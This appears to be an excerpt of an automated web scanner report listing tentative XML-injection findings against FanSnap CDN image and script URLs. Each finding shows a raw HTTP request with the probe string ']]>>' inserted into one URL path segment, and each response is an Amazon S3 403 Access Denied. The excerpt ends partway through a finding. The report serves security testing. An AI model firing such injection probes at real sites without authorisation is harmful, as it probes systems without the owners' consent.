GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/best-valuepoint-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8909734295289F98
x-amz-id-2: NWp6oH8trgD+Dp2PJzV53ulXFMjMKsE0qMet9b1sZFcw2YwoYGqNNgDO6OPfYCsM
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e3c5a8383bbc9b52982f3aaf07db30ab7ab24071faeb3335f3db4289b377821f508c83d35938db9d
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8909734295289F98</RequestId><HostId>NWp6oH8trgD+Dp2PJzV53ulXFMjMKsE0qMet9b1sZFcw2YwoYG
...[SNIP]...

8.14. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/best-valuepoint-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6496BC305C6648B7
x-amz-id-2: ZjP1j5WXiV26OZFfZU2aeqMnc9gKHfGSyzOmFfNiIiNSpQaZveFoyVyICY0dUEv/
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5d3477b0cb64c86fdd3380e009333da7229d1b2d28107c7a657b08c3c64622d72438f5ec574b3e51
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6496BC305C6648B7</RequestId><HostId>ZjP1j5WXiV26OZFfZU2aeqMnc9gKHfGSyzOmFfNiIiNSpQaZve
...[SNIP]...

8.15. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4883EF5FBB9FFA16
x-amz-id-2: X4oTirgkvro8XNZhvJxMZhIZ0dyZa+UGwedFjVJCoHpeav0/sF+Gvzs8OLxCi5ZE
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:57 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3a22a0cf48db25d188a1cf145a865b475641c1cf9fdfdf247bbb76ae39e1cd25dd1844d5213d7416
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4883EF5FBB9FFA16</RequestId><HostId>X4oTirgkvro8XNZhvJxMZhIZ0dyZa+UGwedFjVJCoHpeav0/sF
...[SNIP]...

8.16. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5812A0C13D9CA5E0
x-amz-id-2: NWTrds6K3TJ/14stTtKIx0Yw3vRc6xxKgag2BzN9VbAtZsSJTvSAvCh6vAp2AnPy
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Content-Length: 231
Age: 149
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e4cedb8610a7c537916ace3dea329c72dda9af3bd550077966a5c0d8c0a08717a90744572f9523df
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5812A0C13D9CA5E0</RequestId><HostId>NWTrds6K3TJ/14stTtKIx0Yw3vRc6xxKgag2BzN9VbAtZsSJTv
...[SNIP]...

8.17. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BA86D911F46F4716
x-amz-id-2: uM7o1MqwtNjGBgUuH5aBArq+UOZh6+SQ7SL/0/LncP4bfyU+e3zLnIYILHbxWb/C
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Content-Length: 231
Age: 146
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f6391b120213600d115a77e7b516ff96daafd85dd42dd3dcab3c02c91461f00e5db5f1f277cf3860
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BA86D911F46F4716</RequestId><HostId>uM7o1MqwtNjGBgUuH5aBArq+UOZh6+SQ7SL/0/LncP4bfyU+e3
...[SNIP]...

8.18. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 97A429F94A9FD51A
x-amz-id-2: qR0nBFJ2wPl+JPBirdM+od9ZvSHvphhn8sd5s1iGf0RjMDptHSU0M9PfzUekVSE+
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:00 GMT
Server: AmazonS3
Content-Length: 231
Age: 146
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 969884722028a41b012d3de201a4a6dbbdf632c1c856ca769572c1afd313b55f002377c13ac8bb75
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>97A429F94A9FD51A</RequestId><HostId>qR0nBFJ2wPl+JPBirdM+od9ZvSHvphhn8sd5s1iGf0RjMDptHS
...[SNIP]...

8.19. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4E9E2819F31DCB39
x-amz-id-2: TjzzDdqB7aMnNXELibKZCFpccnF7fRUY2RESMH7gmEvwIslwK7KwvcWbS4pFCsQW
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: AmazonS3
Content-Length: 231
Age: 49
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e1d76a9004904ad7a185cdb8809cd5c43add8e6d6e0bc6e348325a4efeef7d56abbea794f6885aa7
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4E9E2819F31DCB39</RequestId><HostId>TjzzDdqB7aMnNXELibKZCFpccnF7fRUY2RESMH7gmEvwIslwK7
...[SNIP]...

8.20. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/checkout_interstitial.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8966D4E9FF5E403B
x-amz-id-2: 5GE8zcAkl30CPd1rVM3bb40IHXmOThR7j4eCV+e4NHQTInz3j4M1Kvda3zb7TQ1k
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:30 GMT
Server: AmazonS3
Content-Length: 231
Age: 45
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1ab3bac5233e1c8a984e8074543d91f721cd93945579be525a517645ca3f54d9fff511fd8202460b
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8966D4E9FF5E403B</RequestId><HostId>5GE8zcAkl30CPd1rVM3bb40IHXmOThR7j4eCV+e4NHQTInz3j4
...[SNIP]...

8.21. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 819A30940EB51C98
x-amz-id-2: SIUedySiaHk/Mh7l2vDeA+Vm9pa2WXmQNexLlny9Q9bfFx5deyiZ81WqfXnLuKF9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:34 GMT
Server: AmazonS3
Content-Length: 231
Age: 41
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ef86af12eae91607962922e66bd67271e2bb2856524d480aef09e95961dd7894b2f57dd5246fae21
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>819A30940EB51C98</RequestId><HostId>SIUedySiaHk/Mh7l2vDeA+Vm9pa2WXmQNexLlny9Q9bfFx5dey
...[SNIP]...

8.22. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/cancel.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/cancel.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 41D9184ED71E08A9
x-amz-id-2: HnD65mzAS9twyAyBikfpVUenTe7VIoH86jHrtY7t9ZpZWm3VzOZwT+qvrEi9mDAj
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:43 GMT
Server: AmazonS3
Content-Length: 231
Age: 155
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 39cd64f15ac6bc8a38e06cee12812ee3b80fad0809f16db1f842fd5d15a48e27c7fe9084e1c21906
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>41D9184ED71E08A9</RequestId><HostId>HnD65mzAS9twyAyBikfpVUenTe7VIoH86jHrtY7t9ZpZWm3VzO
...[SNIP]...

8.23. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/cancel.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/cancel.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E29750E108656AE1
x-amz-id-2: DTaJ3wj7Wy28Ro62n9sTs63OcgLpzU6trKqC6kcoTjrLVTNEoQvCVG+uf+mljqaa
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Content-Length: 231
Age: 156
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 350156f8d4be285e757cb82f3c280e6c0e8d60b5c9c5643bebe4664e64ee3942740022d79f4795d7
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E29750E108656AE1</RequestId><HostId>DTaJ3wj7Wy28Ro62n9sTs63OcgLpzU6trKqC6kcoTjrLVTNEoQ
...[SNIP]...

8.24. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/cancel.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/cancel.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4CD105DAD25FB802
x-amz-id-2: vS8Ma4M50MA1q8WYGumrMEa/SsBj/Bkvi7f/Bx0Lne2HiijySVzLSdweB8x+21dl
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Content-Length: 231
Age: 153
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b972b75bae70d8447458073f09cf336763f549599a31fcf651268e522225b3c39e7cc3473bba0806
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4CD105DAD25FB802</RequestId><HostId>vS8Ma4M50MA1q8WYGumrMEa/SsBj/Bkvi7f/Bx0Lne2HiijySV
...[SNIP]...

8.25. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-large-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5169D3ECCE955D7D
x-amz-id-2: Jw4lST1978IvxpZDXx348P0CRJ0NdHiAl5ERgiKuAmcQA5IAzenb5RcAahxs2Z8W
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:26 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8a3629974a65ce188658459a047e71f6389867a453fc6dd824ca2888a20d90b0ec57038e168a35df
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5169D3ECCE955D7D</RequestId><HostId>Jw4lST1978IvxpZDXx348P0CRJ0NdHiAl5ERgiKuAmcQA5IAze
...[SNIP]...

8.26. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-large-549.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-large-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 2BB157C8B78CD589
x-amz-id-2: iAvVDpnyDCZ4MzEUfrRSYs3FqbeBDd4sGCzDNQKhhnIcJyFXkd3x7Zyr/cBGjbrV
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:31 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
